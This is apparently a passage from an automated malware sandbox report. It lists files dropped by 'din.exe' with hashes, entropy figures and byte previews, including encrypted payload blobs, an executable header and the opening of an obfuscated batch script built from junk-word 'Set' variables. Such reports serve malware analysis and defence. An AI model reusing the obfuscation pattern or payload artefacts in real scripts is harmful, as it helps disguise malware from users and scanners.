Malicious:	false
Preview:	.L...c..-....=..^..;.a.r.r......;.......4.b..R4...SQ6......`?a.w...f2.u2I-:....a..m79......qQ.\.4.3...b!....\|Yr6.e.>.....i..7.g..y-9p.....y.;..h&........`...Y..u+..&6f#.tg.G.vA.P.$..T....>. .2:d.y.x:.g..&..)z[....[}/.od..ieG1R.C..%.?.........o..N..^.....m.....y0......\.r..0..,\.....h..2.RK..O....7.%...dv.=C....u.j.<..\WA.6.7.I.Y.[....Q.@+.~.5..D\|znF..9..u.?..,.-T.\28..f.tT..\..8.Y.Srh.^.q.. .R. H5..c`.Qt...'W@..g.C.V.bd..4..k....+..].g..s._23.\J,.[...uA.z.w.zg.........Ts......Z1_.}......`/.\...dN.SU.u ....h..h0.IS%.....K)$..<.U~2....]M.8#?.f..@...j.Wl.L./sw..m.m)..>.\|.....^.........o..a.k..-I.Xz.z{..f9.....4.\|.Q..tyZ.uf]...\|K#.......`.0..>...D........e..1.G.g....i]..I..7.t.....!.m......dG.,5cH.}../.....M.n.".v4.#....%.I._v>Nz/#.......w ..$...L%.8...7oL......^.j.........ok.<.TjuZ.....U~..+.;..0.....-^........J.5...B..b..HO...EF..,2....R......_.....$.u)v..-.,.X.B...q.6h...M.!z...+y..b.....$..[3..W..O...=l..t ..Y.......C....5#. ...(

C:\Users\user\AppData\Local\Temp\Apply

Download File

Process:	C:\ProgramData\din.exe
File Type:	data
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	7.998193982960737
Encrypted:	true
SSDEEP:	1536:581QkMhsSIeVPekfq9+LBpXxvoNYmqsYiJjqQlTjzAg8wUcI4mshvDLJauNufu:rnsr9iXh5mTJ1TogccLHN5
MD5:	C42DE4DBF71995864CB37CEFA0533C7D
SHA1:	B02C2017901A73D0C4C5C20D3A80410321C47559
SHA-256:	68EEFFE16E1165A93E224161F46BA8F63BCDAE1A7F46CE8EA3F897452EA5732C
SHA-512:	20250E650B4F35A15F4D6442642C10ED2BC2E571211F3B6EA3E51B077B2639F522EAEE4DB8AFB4463E715923177F8CC39CAE947F15C4BCB44B7E9659FD595BE8
Malicious:	false
Preview:	,.&.Sj....B....g........Y..mG<h..-Qw......CK.1..E.StF....KJ.v.B..U...9......\..b.._.F.(M....B.w..%J..&....%.;`x5..!.....}..@..)M".HB_.u..B(f...G+...y...[["...........)P...}...A...N.5.P7.....&J.@...N+..{T.K....o..91mzF.G.\|...w...g.o.\g.Y.....(.-.X..@$wc..A.....};.k.......j.......`..xHH..).$.t.P.b....p......Q.,.o_.{.\|.......~H.!.7....Cl.+.%F)..`.....?...$.'....^....,..y...,.....{......(.q{...C..5.d].n.=.j..mU.@....c..U..y.......J...Z....@B9..{..........B5@._K.MQ.~.B.....m..`.,%..C.tbMh.H.............._6..Kn. ....#..z.. ...}....d....n;..B.x.GZx..U?}VX...-#.ht!.3..Mpfu.2z..BD.=.j..Aw.e.'...........e..]E......X..z...wC...I..,,.Gz.7.....k...:..h.{.....{P.9....dg@s..B0.&.].#...v..N....K.D}WF...Xz..qq....(.>..Z...'./=9.L...s.{^...L..F.\|..}.Y..;.!..R... ...T.V..z.j.s.{.M,.A...S&..Y...H..)-V.Q...g.>......4o.41.... 1.G...O?)"V.....4Y!Z8......j...J.k..p....".A=.xj*..b....>...+.Q..lnk=...O......IDR&.lo......tm..I-.2.q.m.+...U....#..-.{.A...

C:\Users\user\AppData\Local\Temp\Beverly

Download File

Process:	C:\ProgramData\din.exe
File Type:	data
Category:	dropped
Size (bytes):	893642
Entropy (8bit):	6.6203276113735
Encrypted:	false
SSDEEP:	12288:wpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:wT3E53Myyzl0hMf1te7xaA8M0L
MD5:	F8852907770ABC540C68D2C18FCE16C8
SHA1:	0CD05F67706CEDCF5099C71F8A2911EDE201A9AD
SHA-256:	B66B3F7B61A0BB3517FA992BC8571ECB6CAAE1B1E2CE41447678051E60CAD3FD
SHA-512:	47D12D38417A926EEDB4E5F9E929EAD3F5FA23BDA5B0E95013A8623DEC23F24F10C6F925E8C791518D012D1C0C8DFAB7C6D44EA55AB1B489F07FCCD81DF4A376
Malicious:	false
Preview:	ApplianceFellowshipWhileRegistry..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B..............................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Bulgarian

Download File

Process:	C:\ProgramData\din.exe
File Type:	data
Category:	dropped
Size (bytes):	80896
Entropy (8bit):	7.997844316660108
Encrypted:	true
SSDEEP:	1536:9zj0LSfFXLMsJxRvuUUOvATrQgD3GfbPlG4voRB4BL5hkcueJnpO:GmfFLh7sUUuJcszf5lrw
MD5:	9F7ED81447E582947B823CEE1CB0BD06
SHA1:	DF85A9366CE3CAA7DFE40AE168F7C1AEA5AB2B41
SHA-256:	5D39ED781525848ADFB0791C016870A36B2CF4AF33860DC4945919E90FA30F5B
SHA-512:	46E75D185B0C742915B926AC2AE30B7B451E935285EAA74A02D0531CBE97FBD5641CCD66F43F7F5DD083D106B4AD4517DC47A9FE94D94EFAC6C458B1B540DF88
Malicious:	false
Preview:	.L...c..-....=..^..;.a.r.r......;.......4.b..R4...SQ6......`?a.w...f2.u2I-:....a..m79......qQ.\.4.3...b!....\|Yr6.e.>.....i..7.g..y-9p.....y.;..h&........`...Y..u+..&6f#.tg.G.vA.P.$..T....>. .2:d.y.x:.g..&..)z[....[}/.od..ieG1R.C..%.?.........o..N..^.....m.....y0......\.r..0..,\.....h..2.RK..O....7.%...dv.=C....u.j.<..\WA.6.7.I.Y.[....Q.@+.~.5..D\|znF..9..u.?..,.-T.\28..f.tT..\..8.Y.Srh.^.q.. .R. H5..c`.Qt...'W@..g.C.V.bd..4..k....+..].g..s._23.\J,.[...uA.z.w.zg.........Ts......Z1_.}......`/.\...dN.SU.u ....h..h0.IS%.....K)$..<.U~2....]M.8#?.f..@...j.Wl.L./sw..m.m)..>.\|.....^.........o..a.k..-I.Xz.z{..f9.....4.\|.Q..tyZ.uf]...\|K#.......`.0..>...D........e..1.G.g....i]..I..7.t.....!.m......dG.,5cH.}../.....M.n.".v4.#....%.I._v>Nz/#.......w ..$...L%.8...7oL......^.j.........ok.<.TjuZ.....U~..+.;..0.....-^........J.5...B..b..HO...EF..,2....R......_.....$.u)v..-.,.X.B...q.6h...M.!z...+y..b.....$..[3..W..O...=l..t ..Y.......C....5#. ...(

C:\Users\user\AppData\Local\Temp\Gamma

Download File

Process:	C:\ProgramData\din.exe
File Type:	data
Category:	dropped
Size (bytes):	53248
Entropy (8bit):	7.996835718350488
Encrypted:	true
SSDEEP:	768:LWILm94Z9RPvdwygXYey56/pt3pt1PJPOC710HSYWdfp/kgy4P8Er1YZk1ugZ0+6:L7p79whB9JPH1azW//kgD/ZYZPMqCq
MD5:	A3B204451A021B5488E5328DABA0E2AA
SHA1:	D143158996AEAFB03BB80E8E1D0B204C82780190
SHA-256:	B28794B685826D9910484740C4D43D0B66B68990A79CDC7D3B0518BA621211CE
SHA-512:	62E02902AC0331E37484C66D0FD2CB6F1FF20A2ED709BB63C2A9B4AA01C3729DDB9982B93249D1C15B15EF0F7BB0AA6379F42823191CA39D50BC0C7A4F114F10
Malicious:	false
Preview:	....9y...G6...'.]OnY<...+....[......Sp...\|..L........L..C.o..2\~.h..\|..<J.H..?.t.4=..5..C.YGP_D..HrOL+.....S.Y....U.......Bxj.a....p.......j].....\|....a`yc....D..G~B"y.j...V.~...k..+.}A..mP..J..!i..+8.0w...cJ........0..; .=3......A#.f.'.}=y.}............-.&;L.........H8..V......~..{%./.k....E..x.]?@.y./F........0..L...k...N...{#.H..h...c:#N..7..Gck9..Ud.O7T..k.CC.q}.....'...l..?4~.N...<..]p.}.0....s..m\|-!..].%..dZ-.&.4.8i.+........>.m.Z.3f.L..=9.vw#..........S;b>..vu!..t...`.o.d,\|=..G..M.!.0..\G.].C.6.{......L.,P....Y4.fg.......%=N...P..5..Go.M....}\|x...W9.;A..\.,.W.......X...$.X...(.0.?s..]\|D.j.'......6EC....)...j$..3....u.6Zr....a..LIr:MQ......9.u.+QYn.`@....qh..'......c. .e\'.&..:...#7..\.@;,.1".P.`..N.j~.._B[..]....Y..!..8....7..#C/..._<..:ALD..~.3..?.....$.t.Ow.H... .j.$f.7.rI.^~.y.q.......]..U..:.q=y.-.....&.....>\&.....J...!g.../v...%.....SD8j...$V.%...uvl.GSa........=./.o.5e......1.^V~sK...Y.k.p..a.N..=..D`.x...m...

C:\Users\user\AppData\Local\Temp\Geographic

Download File

Process:	C:\ProgramData\din.exe
File Type:	DOS executable (COM)
Category:	dropped
Size (bytes):	35934
Entropy (8bit):	7.99446079807254
Encrypted:	true
SSDEEP:	768:zbzye8aaZuKlwpZAZHvYrhrqUJeHMEGbGNXfthfIvOJXJxv:zbGeAZhl++vYBSHMm9LfIvyv
MD5:	46CE3E4572A610987B710515DFBC5F0D
SHA1:	D15FB81079DBBD4775B524E081616B31C009E2FE
SHA-256:	C6BFA9351C5B7FFAB36BB7FC11D9C17434B272B25302CF1E1BE668D2ABBDCA42
SHA-512:	B56C78EF33D169B50CAB31FFCFD41FAFE03BC9563851B0DE6FB22F1FC112302E42290707513897D8FBD4402BB00914CF98E69A7FAC897AFF9E8A64ED01DC2DFD
Malicious:	true
Preview:	.'.q..Pe}...V.~ .O.\4...#I._Q.>.GZ..f......L.5jl..#..n.....I..1/.r8..........-...ON.S.1.).h.&\.:....3....."....~`.....H?g....W.9#.#9F...3..B#.....ie ^...U2..tg..TC..$'\|....A9..k.........).\...A.VN#.......`.....{..a..b...`.;.`l........h..e...H\|x.2........h....'.>.m]..Z.On..P.r.;@Pk...d.#..M.'R0I..Ol..j.l.0_;....G...T..V.$6..2.;.i$Emq.=.b,.B..y]...jc.Q...:..4..-.Z..[../.k.s.B.B..<..`.7.(.b...H..2...s..[.Q7Mz_...R.%........itk5.$0............b..6:7......."b...H.B.......^........;./.#.....%.yT,y4..y..D.n.4X.g.....vzo.[..T.....7~.%...7...\R.(J.FY.\...IVl"H...!j..lk.bK.`.T..E.....2.Pf..L)..pr0..7.;..r=.@N.7.P.....u.....A..3{O...v......=O,x..Q.0x..f...f@y..tzg..M......!..!....P.#...^.f......>...;-.{9..Xa.w.JDDZ..<"`.4.Z?.I.u.......:n.@...1.o.'..j....<....5s.+[.^...t.\|._R.A.4..K..2UW.2Y....7.?.....F.N..;.?.K:.........%..M.^5..6f...B...;o.._.!ZK...f.+q.....]eNl..hFd..jk..P].._+..zq'..........,...aY.\7"...4...D......A<.._.e..N./.yQ..$. P~

C:\Users\user\AppData\Local\Temp\Gone

Download File

Process:	C:\ProgramData\din.exe
File Type:	ASCII text, with very long lines (545), with CRLF line terminators
Category:	dropped
Size (bytes):	12282
Entropy (8bit):	5.125405287522625
Encrypted:	false
SSDEEP:	192:/CvoPLi9ZIoG0GXwpgXD4mhfP2wUtO/F46WLnFoW+uWeMIxzGu6rANflnCm1nBJK:/ZPWZPcgpgXvG/tO/FEo1IxqZr2f5vp6
MD5:	30C0B9E2E7ABCAB8A0DA8FC727AA352B
SHA1:	16CEBEDA06F8A6A16FD536BE1EA7E5833028EDC8
SHA-256:	855EADF6BB940BE5A1EAC4CF5AFC063794AAF56AAD97832509A8865896AB83F4
SHA-512:	EA56D9763F6191233FED66E434C7969D73F7A06D3BCE10BBC3AF1E2FF7EA2D4B6BD823864EF4989C72458DD86B6916ACD6519B0C0912841AE81D23261AEB5D81
Malicious:	false
Preview:	Set Rio=O..fPBarely-Seminars-Pete-Lined-..LbOut-Ice-Thumbzilla-Adventures-Southeast-Contents-..wYOeBillion-Lodge-Devon-Advert-Throws-Adidas-Postings-Finding-Despite-..JSfApt-Creator-Guarantee-Thrown-..KYDrag-Rid-Our-Pcs-Gadgets-Stack-Va-Missouri-..AjQMechanism-Marketing-Parallel-..peyBroader-Restoration-Arms-..Set Zoophilia=j..jEThompson-Advancement-Midi-Wanted-Bald-Runner-Tension-..UkRArms-Inclusive-Pros-Celebs-Occurring-Classic-Son-Aruba-..agPossess-Leaf-Voip-..lUMatrix-..WixRAnxiety-Question-Notice-Josh-Casinos-Memorabilia-Illustrations-Logic-Charms-..Set Divisions=/..DaAntenna-Household-Chain-Stage-Differential-Properties-Dropped-Afghanistan-Demonstrates-..cgJhDeclaration-Funky-Ross-Alter-Kilometers-Pittsburgh-Az-Identify-Lat-..QsTAirfare-Inkjet-Hobby-..pfFJLogin-Casio-Cest-Race-Pdas-Distributors-Boring-..ILSCottage-Generous-Maintaining-Suppose-..YZDeals-Img-Fraser-Grenada-Remove-Creativity-..ZzWebmasters-Georgia-Melbourne-Portfolio-Depression-..sXcoDakota-Centre-Objectives-Analyse

C:\Users\user\AppData\Local\Temp\Gone.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (545), with CRLF line terminators
Category:	dropped
Size (bytes):	12282
Entropy (8bit):	5.125405287522625
Encrypted:	false
SSDEEP:	192:/CvoPLi9ZIoG0GXwpgXD4mhfP2wUtO/F46WLnFoW+uWeMIxzGu6rANflnCm1nBJK:/ZPWZPcgpgXvG/tO/FEo1IxqZr2f5vp6
MD5:	30C0B9E2E7ABCAB8A0DA8FC727AA352B
SHA1:	16CEBEDA06F8A6A16FD536BE1EA7E5833028EDC8
SHA-256:	855EADF6BB940BE5A1EAC4CF5AFC063794AAF56AAD97832509A8865896AB83F4
SHA-512:	EA56D9763F6191233FED66E434C7969D73F7A06D3BCE10BBC3AF1E2FF7EA2D4B6BD823864EF4989C72458DD86B6916ACD6519B0C0912841AE81D23261AEB5D81
Malicious:	false
Preview:	Set Rio=O..fPBarely-Seminars-Pete-Lined-..LbOut-Ice-Thumbzilla-Adventures-Southeast-Contents-..wYOeBillion-Lodge-Devon-Advert-Throws-Adidas-Postings-Finding-Despite-..JSfApt-Creator-Guarantee-Thrown-..KYDrag-Rid-Our-Pcs-Gadgets-Stack-Va-Missouri-..AjQMechanism-Marketing-Parallel-..peyBroader-Restoration-Arms-..Set Zoophilia=j..jEThompson-Advancement-Midi-Wanted-Bald-Runner-Tension-..UkRArms-Inclusive-Pros-Celebs-Occurring-Classic-Son-Aruba-..agPossess-Leaf-Voip-..lUMatrix-..WixRAnxiety-Question-Notice-Josh-Casinos-Memorabilia-Illustrations-Logic-Charms-..Set Divisions=/..DaAntenna-Household-Chain-Stage-Differential-Properties-Dropped-Afghanistan-Demonstrates-..cgJhDeclaration-Funky-Ross-Alter-Kilometers-Pittsburgh-Az-Identify-Lat-..QsTAirfare-Inkjet-Hobby-..pfFJLogin-Casio-Cest-Race-Pdas-Distributors-Boring-..ILSCottage-Generous-Maintaining-Suppose-..YZDeals-Img-Fraser-Grenada-Remove-Creativity-..ZzWebmasters-Georgia-Melbourne-Portfolio-Depression-..sXcoDakota-Centre-Objectives-Analyse

C:\Users\user\AppData\Local\Temp\July

Download File

Process:	C:\ProgramData\din.exe
File Type:	data
Category:	dropped
Size (bytes):	99328
Entropy (8bit):	7.998179736820114
Encrypted:	true
SSDEEP:	3072:dlcuSXCBh3/EDabJ6EB4rHSfpjZZy6rMtk0:QXCBJlbJ6M0Sfpjq6ol
MD5:	72809EAE38C5603C81DFCC272973BDD8
SHA1:	957F1E7DD23B3D845D74FF33C6BD43EFE12403A9
SHA-256:	BF34E8FE6FA5EDF04A588478CE9558337F59CAF33E6B9753A12192777DFF6C58
SHA-512:	55AB7703F87586039F2AA62FE7B467046032A5559F47015FE6B6CAEE300AC51CAC241B79017860F5A6A92F8503C1C6CA75875A70172F7F721F1515B1834E1E98
Malicious:	false
Preview:	G....<.<.U&?....C.!..U.....Sd.\..p.....L869.Ct.q..h...........#.u..~..[..yQ....XH....bR..&#..`...{5u..h......5.OH7{...{.....AO.......?@..e.v.....'.pQ.U5..w3...N..vn...b`.....d.N...l.E7DD....J......R:.8.j..m.T....'....<En.S...0..=:......r5e.......x.....]3....m..e[x..P~.G.~.O...+5...=.E7....h.g.......&..S...Q.........n.....}..n..wu...V.C..6...M.U......Zq.=!.=.@]...N=..,.G......bT.7.P..Z.o..h8..=.,1.x;?Q.......r.v....@.....\|...M..:7...;..\|Ni.1.w@.'...D.....!r...6Lb.O.....+,.4..]..... .M....\W3...x.l..RF...We..l.t.......S2...J(..B..h.NMY.vn.P.&g.jej+.i.4Z..x..b)..N. .'.e.t..Z.c5..xhja....{.W....+X.+...r..rp.P.#.&j-.c.....\'...-..N..M:......Z..+Ss..dj.1 .[~B.5^.V..cb.&..q..H.....{.u..w......Q.a...]...$.R.#...I[E.....b.i.D..N....m-.z.e8..kED}Ow..\|....2..`f.6.sTJ..W..\X.h....\.G.&a.zs../..Th=..C.7..B......+.0.B........6o...sS..$..8{......y.l.n!..A..N......3.xXM.....H5.P..`.s&.q........Q.`x....U..oK_~E./7..5."..<........J)b..CV"tQ..!?

C:\Users\user\AppData\Local\Temp\Legs

Download File

Process:	C:\ProgramData\din.exe
File Type:	data
Category:	dropped
Size (bytes):	83968
Entropy (8bit):	7.997988228501729
Encrypted:	true
SSDEEP:	1536:AAmetsMZMddipzg/slE37Hyaoc8kcvc3mry+eMYScr6s/eAMo0wcOdWxX:ATCsMJFgUlE37yvVvGmZ4JreBo0gc
MD5:	20871446102E94D2BF65149897B75B29
SHA1:	AF62C2F48FEB2CC19635DADA3437925C95F5CCEA
SHA-256:	AD8209B8D233E9EF85B240CA4B8EAA74BE9F60C444ED2C70FE7361CB8F26D693
SHA-512:	44052656468A41E4D70DB942AC19430FCA156F5BA5BB529F7C1A3C88A67DEBC24CE790E0C90B0F4221D76F44288B0D05A1E12AE8741BE5F8FBF63D535579F503
Malicious:	false
Preview:	"..#..fu..W{.kh\|Q.,.......R.3.h.S...V7....v.....1.../...z..T.O:...9....q..o.Ul_.~......"......D@.o....mw...f6../.'...jv+....X5D..k.."2..b.D.]..;.....9.....L.b....yCN.M.....ai...st......+...n..b.M..{.\...3.[..I..S..YZ!2 ..%rw.<P..iV5....g.X-$/..t..AD<?.fC}}e..M(...K.~s.....]......l...\m.m\|.:%6f.....73M.O..?&s1.......8.S_.0..s...w].....ALp~.K..a+..Y....".3..J....h#..v..;..'Z...&.X.....k[.....g (..<e..l..7.<x3..?...S...6...!]\|...h.H'..h=."..q<~.y.d.TJ.a.o.8t..]g)~.B.....NW.....8H.5..xa...mr.u~N.5...._..76C.l...1.4..z..7d.p.?%O.!w.C.s.C.~3Hl.....Q8.}.G.......]..9c.n_..~....[...C.Y:[U.u.....O0n....B.4.#g..ZLV...4..]%3.X....9.!.aw....M.........z.o#.1=....x.c.viV...a.......9x@.{....o22Y.n...."..ds..KG.....l..g................$.O6A...3.A4g..l..iz....=...Ybw..B....t.XL9^...0.Fe%f.B.a...a.S...N..^...>j,U..>+..9...%n..h...D<+..tH.x..w@.%eWc.9.....Y....F.J..ct.7..................}.D.VT,..VefYS.G.8!...l!.?k..'......U....G9G%.....}....`......WX%3G)....0P}p.Z

C:\Users\user\AppData\Local\Temp\Rules

Download File

Process:	C:\ProgramData\din.exe
File Type:	data
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	7.997989534224249
Encrypted:	true
SSDEEP:	1536:B3bxQ3uIVgnteqVQv64r/O+SZH0mzURoFbA6ptVF9D/d/x0WbZS0+anXrvHw0ax8:A3vVYeqSi8SS6F06Vbd/CcXr/wtZcUh6
MD5:	75A49534DE42C80ECB70AE4B6D6EAB24
SHA1:	1052978A6EAF6151135EDA3B4F4027530841127F
SHA-256:	2705ACED53B69A140CD5ECC438C362F0F07EF29D802D8D18CE948C0ED1CB4FB1
SHA-512:	2ACAEFF46043D9197C29F123A5E7943944A3832D00C50CA0FEAAFF1C397A15E679868B345AC50AFAB6583B665B52C0468A264EFA7836BA433D198D656056B506
Malicious:	false
Preview:	.e.a..&YY... .B.67...j..x;..z.##..cJ.g.)......-...'.Z.....Oz.W....b.W.Yw.K<.H.u9.o........?..=.5%..H........o3.o.5p.?...p..C.+...6u....AL.....{..V..L..V.G.qb.z.!F.r1!.0....m\|....Cb...=,a7.]b>......sA....xR....l.V...s.>T..Y....6GG&47}......>.V).....'9:.Q..G....w..Y%`.\|.6.f.\J..+.Q..vg<.}.}.r...r..b..Mb..k.....Y.H.e......BJb....R..q\.-..D4....Cv...v..e...k.U..^u....<.\.....B.....j.......Sbw61...Y:.....\|........rZ..uD.H....>....<.5..o..$P\|z.E..`.-.).......i"\>.1`N=].....<Vh7...p.4..I.A.z.....+-7hzh.j..n.P.s....{...jP=P...K.tyd`..P...p..7.w.)k..4q..g`Ot..P..{.r..=:."P7.S....."T.....C...z.r...$2..Tl.S.:...2-.w.n.a..7..$......M...t..M.......zty...!8I)0,.!@v...\<..h....a^6ns,.c5=....Tc...W..s...f....s...H..w.a....v.\|..!...n.....#f.i...Jt..}J....+q.50.....:.3..q-.a.=.n..+..u.$E..zmM...$Ue...A.y...1g.N....I@.8k.H..U.......H.l#.....#..R...Y.?..M#...@j..".M.5.^)O.B8[.8..4.N.q.>...~.y...y....t.rG...m...^..e.].1.Mz....28/z).)R....)A..z,J.1.T.....

C:\Users\user\AppData\Local\Temp\Vat

Download File

Process:	C:\ProgramData\din.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	92160
Entropy (8bit):	7.998155654444929
Encrypted:	true
SSDEEP:	1536:kamHdlngItyqUbxXKrpEGIPkzVLGzmvfXqXyVWJCcBH9QtDQe1vHdsO2L:DmHdlnjtyqsxXKrpEGIsz551ncBH9w0N
MD5:	AF1639598B700B696B2E0122AA559A72
SHA1:	BEDA4EBC06364889054D048E7FB6EEBC86E5D98F
SHA-256:	CE76E37CD7C76852D42D4E830A49558AE0A17A7D7AEEB1B77DCE2B6797FF9DBC
SHA-512:	7220F49B46F1CF221B0FB404186748CD66207C1C6CA22DC2819155D91370049EDE9D13E8837DB539D0EDE498A1F2DA58EC59233D5EC39A7F28F919E101D7DF15
Malicious:	false
Preview:	./......Yt..-..~\|V......m.....2nN....7N.%.]..$.....F...l...s.&..G..X..@.}...w.~S.V..)`..U......0.H.2A ......TY..~a.R.lx..!.~.A.u.J..m.A1...p....G<U.<..d.y_.$f@.4d......[C.K.$n?..f..H.Z?....K..S...OW.._.e.......vG^...w}z!..&.k.......7.+..W..w...)n...P....=......^TL...A\&..%..&...T..l+%..l\|A.w...tY..L...z}q=.2x..e.X.'.Q...X.FrK....'..U_........tI.,......8..~.!.....^\|2..b.....(........).s.[.K7.(#w....Vu_xy..b..+).V`.{^.....\P..]./...P.....U.^S.2W.L+[..sAf..,.Ls.H.k0......D...F4.1?.......:......\|...l.N..,...{>.....b2..<...?A....7tlB)..oE.a/.-.....5Rb...M..wp..e.C...Y...g."...o...%xC...f.f.!.\^.......7.Y.R..c.t.Y.!...b.-(...."L.t..$....BA..}F..\|bt.W.3..J@.~.z.s..N..2U.Um..........R..9.........2...W.f.Js(.......g=C...W:l..;....!...i ..nv.....E?...I..:Bm..bC$...\.M.."...[J3...m.c.c\~]W{)....*...}....a...v...n.G.U........_.r.8.."...-...-.N.vSRV.......:.....J.vP.k..R..Y...gc;...<U...z/....v._q..I..J.. .7.6.f...w....iW..Sr5..P....V.}.X...... .&!

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fuznuhat.cqw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mfe0w1he.o2f.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ou3ubnnt.vfx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xoqwb1wt.fjm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Chrome Cache Entry: 81

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (798)
Category:	downloaded
Size (bytes):	803
Entropy (8bit):	5.139496644424604
Encrypted:	false
SSDEEP:	24:tVJFrDAW/OtWBHslgT9lCuABuyh7HHHHHHHYqmffffffo:rF/NKlgZ01BuIEqmffffffo
MD5:	22599206976F080C794C4C7C4608F4DC
SHA1:	028D1EBB20CF174452122CDC1D13F60AB01451C0
SHA-256:	74939EEA164B4B92DD4C018F1D86D8466E597DABAA2AE33C53C9487F8A8BAC85
SHA-512:	3C4593E1D78EACE3F586515D7E02CEAED49D6101903C36381F83C40DED1743E409F535DE5967ACD6F6122867A5555C0CAAAD61BBBED16A9AEF351642BA5D2BEE
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["rockstar games gta 6 trailer","30 under 30","snow storm weather forecast","asteroid hitting earth nasa","nintendo switch cyber monday deals","memphis grizzlies vs dallas mavericks","alaska fishing boat capsized","zodiac signs ready for soulmate"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1254,1253,1252,1251,1250,702,701,700],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

